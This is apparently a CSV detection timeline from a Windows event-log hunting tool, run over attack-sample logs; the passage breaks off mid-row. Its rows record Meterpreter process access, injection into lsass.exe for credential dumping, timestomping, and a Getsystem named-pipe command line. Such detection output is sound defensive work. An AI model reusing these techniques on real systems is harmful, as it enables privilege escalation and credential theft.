365ABB72-F6A4-5CC7-0000-001098750100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\sppsvc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1896 | Tgt PGUID: 365ABB72-F6A4-5CC7-0000-001020BA0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2160 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00100CD40100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2192 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-001094D70100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2360 | Tgt PGUID: 365ABB72-F6A5-5CC7-0000-00108AFF0100,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Program Files\Google\Update\1.3.34.7\GoogleCrashHandler.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2416 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-00103F140200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\rundll32.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2448 | Tgt PGUID: 365ABB72-F6A6-5CC7-0000-0010DC200200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\Dwm.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2788 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010A25C0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\Explorer.EXE | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\System32\VBoxTray.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2908 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-00109B9A0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Roaming\svchost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3016 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-00104DBB0600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.914 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3028 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001048C10600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3044 | Tgt PGUID: 365ABB72-F6CA-5CC7-0000-001017C50600,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\SearchIndexer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3264 | Tgt PGUID: 365ABB72-F6CF-5CC7-0000-00100C870700,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 365ABB72-F797-5CC7-0000-00105AF70A00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx 2019-04-30 16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx 2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,../hayabusa-rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,../hayabusa-rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx 2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx 2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,../hayabusa-rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx 2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: 